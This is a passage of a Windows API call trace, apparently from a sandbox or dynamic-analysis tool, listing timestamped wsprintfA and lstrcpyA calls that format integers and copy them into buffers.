[0158.069] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3332120") returned 7 [0158.069] lstrcpyA (in: lpString1=0x321ba8, lpString2="3332120" | out: lpString1="3332120") 
returned="3332120" [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="872") returned 3 [0158.069] lstrcpyA (in: lpString1=0x431800, lpString2="872" | out: lpString1="872") returned="872" [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1748") returned 4 [0158.069] lstrcpyA (in: lpString1=0x430800, lpString2="1748" | out: lpString1="1748") returned="1748" [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.069] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="528") returned 3 [0158.070] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3332120") returned 7 [0158.070] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3332648") returned 7 [0158.070] lstrcpyA (in: lpString1=0x321ba8, lpString2="3332648" | out: lpString1="3332648") returned="3332648" [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.070] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1192") returned 4 [0158.070] lstrcpyA (in: lpString1=0x430800, lpString2="1192" | out: lpString1="1192") returned="1192" [0158.070] 
wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1488") returned 4 [0158.070] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.070] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3332648") returned 7 [0158.070] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3334136") returned 7 [0158.071] lstrcpyA (in: lpString1=0x321ba8, lpString2="3334136" | out: lpString1="3334136") returned="3334136" [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.071] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1612") returned 4 [0158.071] lstrcpyA (in: lpString1=0x430800, lpString2="1612" | out: lpString1="1612") returned="1612" [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") 
returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="856") returned 3 [0158.071] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.071] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3334136") returned 7 [0158.071] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3334992") returned 7 [0158.074] lstrcpyA (in: lpString1=0x321ba8, lpString2="3334992" | out: lpString1="3334992") returned="3334992" [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.074] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="684") returned 3 [0158.074] lstrcpyA (in: lpString1=0x430800, lpString2="684" | out: lpString1="684") returned="684" [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.074] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="360") returned 3 [0158.075] lstrcpyA (in: lpString1=0x431000, 
lpString2="360" | out: lpString1="360") returned="360" [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3334992") returned 7 [0158.075] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3335352") returned 7 [0158.075] lstrcpyA (in: lpString1=0x321ba8, lpString2="3335352" | out: lpString1="3335352") returned="3335352" [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.075] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="528") returned 3 [0158.075] lstrcpyA (in: lpString1=0x430800, lpString2="528" | out: lpString1="528") returned="528" [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.075] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="328") returned 3 [0158.076] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3335352") returned 7 [0158.076] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3335680") returned 7 [0158.076] lstrcpyA (in: lpString1=0x321ba8, lpString2="3335680" | out: lpString1="3335680") returned="3335680" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: 
param_1="1664") returned 4 [0158.076] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1852") returned 4 [0158.076] lstrcpyA (in: lpString1=0x430800, lpString2="1852" | out: lpString1="1852") returned="1852" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="352") returned 3 [0158.076] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.076] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3335680") returned 7 [0158.076] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3336032") returned 7 [0158.077] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336032" | out: lpString1="3336032") returned="3336032" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.077] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1428") returned 4 [0158.077] lstrcpyA (in: lpString1=0x430800, lpString2="1428" | out: lpString1="1428") returned="1428" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 
[0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="360") returned 3 [0158.077] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3336032") returned 7 [0158.077] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3336392") returned 7 [0158.077] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336392" | out: lpString1="3336392") returned="3336392" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.077] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="2000") returned 4 [0158.077] lstrcpyA (in: lpString1=0x430800, lpString2="2000" | out: lpString1="2000") returned="2000" [0158.077] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: 
param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="384") returned 3 [0158.078] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3336392") returned 7 [0158.078] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3336776") returned 7 [0158.078] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336776" | out: lpString1="3336776") returned="3336776" [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1664") returned 4 [0158.078] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1088") returned 4 [0158.078] lstrcpyA (in: lpString1=0x430800, lpString2="1088" | out: lpString1="1088") returned="1088" [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.078] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.079] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.079] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337120" | out: lpString1="3337120") returned="3337120" [0158.079] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") 
returned="1664" [0158.079] lstrcpyA (in: lpString1=0x430800, lpString2="860" | out: lpString1="860") returned="860" [0158.079] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.079] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337464" | out: lpString1="3337464") returned="3337464" [0158.079] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.079] lstrcpyA (in: lpString1=0x430800, lpString2="560" | out: lpString1="560") returned="560" [0158.079] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.079] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337792" | out: lpString1="3337792") returned="3337792" [0158.080] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.080] lstrcpyA (in: lpString1=0x430800, lpString2="1216" | out: lpString1="1216") returned="1216" [0158.080] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.080] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338176" | out: lpString1="3338176") returned="3338176" [0158.080] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.080] lstrcpyA (in: lpString1=0x430800, lpString2="1180" | out: lpString1="1180") returned="1180" [0158.080] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.080] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338536" | out: lpString1="3338536") returned="3338536" [0158.080] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.080] lstrcpyA (in: lpString1=0x430800, lpString2="328" | out: lpString1="328") returned="328" [0158.080] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.080] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338888" | out: lpString1="3338888") returned="3338888" 
[0158.081] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.081] lstrcpyA (in: lpString1=0x430800, lpString2="564" | out: lpString1="564") returned="564" [0158.081] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.081] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339240" | out: lpString1="3339240") returned="3339240" [0158.081] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.081] lstrcpyA (in: lpString1=0x430800, lpString2="1276" | out: lpString1="1276") returned="1276" [0158.081] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.081] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339576" | out: lpString1="3339576") returned="3339576" [0158.081] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.081] lstrcpyA (in: lpString1=0x430800, lpString2="1392" | out: lpString1="1392") returned="1392" [0158.081] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.081] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339928" | out: lpString1="3339928") returned="3339928" [0158.082] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.082] lstrcpyA (in: lpString1=0x430800, lpString2="712" | out: lpString1="712") returned="712" [0158.082] lstrcpyA (in: lpString1=0x431000, lpString2="368" | out: lpString1="368") returned="368" [0158.082] lstrcpyA (in: lpString1=0x321ba8, lpString2="3340296" | out: lpString1="3340296") returned="3340296" [0158.082] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.082] lstrcpyA (in: lpString1=0x430800, lpString2="1744" | out: lpString1="1744") returned="1744" [0158.082] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.082] lstrcpyA (in: 
lpString1=0x321ba8, lpString2="3340656" | out: lpString1="3340656") returned="3340656" [0158.082] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.082] lstrcpyA (in: lpString1=0x430800, lpString2="1680" | out: lpString1="1680") returned="1680" [0158.082] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.082] lstrcpyA (in: lpString1=0x321ba8, lpString2="3341008" | out: lpString1="3341008") returned="3341008" [0158.083] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.083] lstrcpyA (in: lpString1=0x430800, lpString2="388" | out: lpString1="388") returned="388" [0158.083] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.083] lstrcpyA (in: lpString1=0x321ba8, lpString2="3341392" | out: lpString1="3341392") returned="3341392" [0158.083] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.083] lstrcpyA (in: lpString1=0x430800, lpString2="2476" | out: lpString1="2476") returned="2476" [0158.083] lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.083] lstrcpyA (in: lpString1=0x321ba8, lpString2="3343584" | out: lpString1="3343584") returned="3343584" [0158.083] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.083] lstrcpyA (in: lpString1=0x430800, lpString2="2516" | out: lpString1="2516") returned="2516" [0158.083] lstrcpyA (in: lpString1=0x431000, lpString2="592" | out: lpString1="592") returned="592" [0158.083] lstrcpyA (in: lpString1=0x321ba8, lpString2="3344176" | out: lpString1="3344176") returned="3344176" [0158.084] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.084] lstrcpyA (in: lpString1=0x430800, lpString2="2552" | out: lpString1="2552") returned="2552" [0158.084] lstrcpyA (in: 
lpString1=0x431000, lpString2="592" | out: lpString1="592") returned="592" [0158.084] lstrcpyA (in: lpString1=0x321ba8, lpString2="3344768" | out: lpString1="3344768") returned="3344768" [0158.084] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.084] lstrcpyA (in: lpString1=0x430800, lpString2="2592" | out: lpString1="2592") returned="2592" [0158.084] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.084] lstrcpyA (in: lpString1=0x321ba8, lpString2="3345296" | out: lpString1="3345296") returned="3345296" [0158.084] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.084] lstrcpyA (in: lpString1=0x430800, lpString2="2624" | out: lpString1="2624") returned="2624" [0158.084] lstrcpyA (in: lpString1=0x431000, lpString2="976" | out: lpString1="976") returned="976" [0158.085] lstrcpyA (in: lpString1=0x321ba8, lpString2="3346272" | out: lpString1="3346272") returned="3346272" [0158.085] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.085] lstrcpyA (in: lpString1=0x430800, lpString2="2948" | out: lpString1="2948") returned="2948" [0158.085] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.085] lstrcpyA (in: lpString1=0x321ba8, lpString2="3346800" | out: lpString1="3346800") returned="3346800" [0158.085] lstrcpyA (in: lpString1=0x431800, lpString2="3064" | out: lpString1="3064") returned="3064" [0158.085] lstrcpyA (in: lpString1=0x430800, lpString2="1224" | out: lpString1="1224") returned="1224" [0158.085] lstrcpyA (in: lpString1=0x431000, lpString2="0" | out: lpString1="0") returned="0" [0158.085] lstrcpyA (in: lpString1=0x321ba8, lpString2="3304744" | out: lpString1="3304744") returned="3304744" [0158.085] lstrcpyA (in: lpString1=0x431800, lpString2="0" | out: lpString1="0") returned="0" [0158.085] lstrcpyA (in: lpString1=0x430800, lpString2="0" | 
out: lpString1="0") returned="0" [0158.085] lstrcpyA (in: lpString1=0x431000, lpString2="248" | out: lpString1="248") returned="248" [0158.086] lstrcpyA (in: lpString1=0x321ba8, lpString2="3304992" | out: lpString1="3304992") returned="3304992" [0158.086] lstrcpyA (in: lpString1=0x431800, lpString2="4" | out: lpString1="4") returned="4" [0158.086] lstrcpyA (in: lpString1=0x430800, lpString2="3310360" | out: lpString1="3310360") returned="3310360" [0158.086] lstrcpyA (in: lpString1=0x431000, lpString2="5384" | out: lpString1="5384") returned="5384" [0158.086] lstrcpyA (in: lpString1=0x321ba8, lpString2="3310376" | out: lpString1="3310376") returned="3310376" [0158.086] lstrcpyA (in: lpString1=0x431800, lpString2="264" | out: lpString1="264") returned="264" [0158.086] lstrcpyA (in: lpString1=0x430800, lpString2="3310688" | out: lpString1="3310688") returned="3310688" [0158.086] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.086] lstrcpyA (in: lpString1=0x321ba8, lpString2="3310712" | out: lpString1="3310712") returned="3310712" [0158.086] lstrcpyA (in: lpString1=0x431800, lpString2="332" | out: lpString1="332") returned="332" [0158.086] lstrcpyA (in: lpString1=0x430800, lpString2="3311472" | out: lpString1="3311472") returned="3311472" [0158.086] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.087] lstrcpyA (in: lpString1=0x321ba8, lpString2="3311496" | out: lpString1="3311496") returned="3311496" [0158.087] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.087] lstrcpyA (in: lpString1=0x430800, lpString2="3311872" | out: lpString1="3311872") returned="3311872" [0158.087] lstrcpyA (in: lpString1=0x431000, lpString2="400" | out: lpString1="400") returned="400" [0158.087] lstrcpyA (in: lpString1=0x321ba8, lpString2="3311896" | out: lpString1="3311896") returned="3311896" [0158.087] lstrcpyA (in: lpString1=0x431800, lpString2="392" 
| out: lpString1="392") returned="392" [0158.087] lstrcpyA (in: lpString1=0x430800, lpString2="3312656" | out: lpString1="3312656") returned="3312656" [0158.087] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.087] lstrcpyA (in: lpString1=0x321ba8, lpString2="3312680" | out: lpString1="3312680") returned="3312680" [0158.087] lstrcpyA (in: lpString1=0x431800, lpString2="432" | out: lpString1="432") returned="432" [0158.087] lstrcpyA (in: lpString1=0x430800, lpString2="3313120" | out: lpString1="3313120") returned="3313120" [0158.087] lstrcpyA (in: lpString1=0x431000, lpString2="472" | out: lpString1="472") returned="472" [0158.088] lstrcpyA (in: lpString1=0x321ba8, lpString2="3313152" | out: lpString1="3313152") returned="3313152" [0158.088] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.088] lstrcpyA (in: lpString1=0x430800, lpString2="3314040" | out: lpString1="3314040") returned="3314040" [0158.088] lstrcpyA (in: lpString1=0x431000, lpString2="920" | out: lpString1="920") returned="920" [0158.088] lstrcpyA (in: lpString1=0x321ba8, lpString2="3314072" | out: lpString1="3314072") returned="3314072" [0158.088] lstrcpyA (in: lpString1=0x431800, lpString2="484" | out: lpString1="484") returned="484" [0158.088] lstrcpyA (in: lpString1=0x430800, lpString2="3314704" | out: lpString1="3314704") returned="3314704" [0158.088] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.088] lstrcpyA (in: lpString1=0x321ba8, lpString2="3314728" | out: lpString1="3314728") returned="3314728" [0158.088] lstrcpyA (in: lpString1=0x431800, lpString2="492" | out: lpString1="492") returned="492" [0158.088] lstrcpyA (in: lpString1=0x430800, lpString2="3315552" | out: lpString1="3315552") returned="3315552" [0158.088] lstrcpyA (in: lpString1=0x431000, lpString2="840" | out: lpString1="840") returned="840" [0158.089] lstrcpyA (in: lpString1=0x321ba8, 
lpString2="3315568" | out: lpString1="3315568") returned="3315568" [0158.089] lstrcpyA (in: lpString1=0x431800, lpString2="600" | out: lpString1="600") returned="600" [0158.089] lstrcpyA (in: lpString1=0x430800, lpString2="3316456" | out: lpString1="3316456") returned="3316456" [0158.089] lstrcpyA (in: lpString1=0x431000, lpString2="912" | out: lpString1="912") returned="912" [0158.089] lstrcpyA (in: lpString1=0x321ba8, lpString2="3316480" | out: lpString1="3316480") returned="3316480" [0158.089] lstrcpyA (in: lpString1=0x431800, lpString2="664" | out: lpString1="664") returned="664" [0158.089] lstrcpyA (in: lpString1=0x430800, lpString2="3317176" | out: lpString1="3317176") returned="3317176" [0158.089] lstrcpyA (in: lpString1=0x431000, lpString2="720" | out: lpString1="720") returned="720" [0158.089] lstrcpyA (in: lpString1=0x321ba8, lpString2="3317200" | out: lpString1="3317200") returned="3317200" [0158.089] lstrcpyA (in: lpString1=0x431800, lpString2="716" | out: lpString1="716") returned="716" [0158.089] lstrcpyA (in: lpString1=0x430800, lpString2="3318792" | out: lpString1="3318792") returned="3318792" [0158.090] lstrcpyA (in: lpString1=0x431000, lpString2="1616" | out: lpString1="1616") returned="1616" [0158.090] lstrcpyA (in: lpString1=0x321ba8, lpString2="3318816" | out: lpString1="3318816") returned="3318816" [0158.090] lstrcpyA (in: lpString1=0x431800, lpString2="828" | out: lpString1="828") returned="828" [0158.090] lstrcpyA (in: lpString1=0x430800, lpString2="3320280" | out: lpString1="3320280") returned="3320280" [0158.090] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.090] lstrcpyA (in: lpString1=0x321ba8, lpString2="3320304" | out: lpString1="3320304") returned="3320304" [0158.090] lstrcpyA (in: lpString1=0x431800, lpString2="872" | out: lpString1="872") returned="872" [0158.090] lstrcpyA (in: lpString1=0x430800, lpString2="3322472" | out: lpString1="3322472") returned="3322472" [0158.090] 
lstrcpyA (in: lpString1=0x431000, lpString2="2192" | out: lpString1="2192") returned="2192" [0158.090] lstrcpyA (in: lpString1=0x321ba8, lpString2="3322496" | out: lpString1="3322496") returned="3322496" [0158.090] lstrcpyA (in: lpString1=0x431800, lpString2="932" | out: lpString1="932") returned="932" [0158.091] lstrcpyA (in: lpString1=0x430800, lpString2="3323128" | out: lpString1="3323128") returned="3323128" [0158.091] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.091] lstrcpyA (in: lpString1=0x321ba8, lpString2="3323152" | out: lpString1="3323152") returned="3323152" [0158.091] lstrcpyA (in: lpString1=0x431800, lpString2="1008" | out: lpString1="1008") returned="1008" [0158.091] lstrcpyA (in: lpString1=0x430800, lpString2="3324232" | out: lpString1="3324232") returned="3324232" [0158.091] lstrcpyA (in: lpString1=0x431000, lpString2="1104" | out: lpString1="1104") returned="1104" [0158.091] lstrcpyA (in: lpString1=0x321ba8, lpString2="3324256" | out: lpString1="3324256") returned="3324256" [0158.091] lstrcpyA (in: lpString1=0x431800, lpString2="536" | out: lpString1="536") returned="536" [0158.091] lstrcpyA (in: lpString1=0x430800, lpString2="3325464" | out: lpString1="3325464") returned="3325464" [0158.091] lstrcpyA (in: lpString1=0x431000, lpString2="1232" | out: lpString1="1232") returned="1232" [0158.091] lstrcpyA (in: lpString1=0x321ba8, lpString2="3325488" | out: lpString1="3325488") returned="3325488" [0158.091] lstrcpyA (in: lpString1=0x431800, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.092] lstrcpyA (in: lpString1=0x430800, lpString2="3326504" | out: lpString1="3326504") returned="3326504" [0158.092] lstrcpyA (in: lpString1=0x431000, lpString2="1040" | out: lpString1="1040") returned="1040" [0158.092] lstrcpyA (in: 